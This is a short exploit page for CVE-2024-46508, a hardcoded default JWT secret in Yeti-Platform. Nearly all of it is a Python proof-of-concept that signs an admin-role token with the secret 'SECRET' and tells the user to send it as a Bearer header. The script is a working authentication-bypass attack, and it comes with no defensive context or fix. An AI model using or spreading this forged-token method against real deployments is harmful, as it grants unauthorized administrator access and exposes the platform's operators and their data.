CVE-2024-46508 Yeti-Platform 默认JWT密钥漏洞

import jwt import datetime def generate_admin_token(): # The default hardcoded secret key in vulnerable Yeti versions DEFAULT_SECRET = "SECRET" # Construct a payload with admin privileges payload = { "sub": "admin", # Subject (User ID) "role": "admin", # Admin role "iat": datetime.datetime.utcnow(), # Issued at "exp": datetime.datetime.utcnow() + datetime.timedelta(days=1) # Expiration } # Encode the payload using the default secret # HS256 is the typical algorithm for this kind of setup token = jwt.encode(payload, DEFAULT_SECRET, algorithm="HS256") return token if __name__ == "__main__": print("[+] Generating forged JWT token...") forged_token = generate_admin_token() print(f"[+] Forged Token: {forged_token}") print("[+] Use this token in the Authorization header (Bearer <token>)")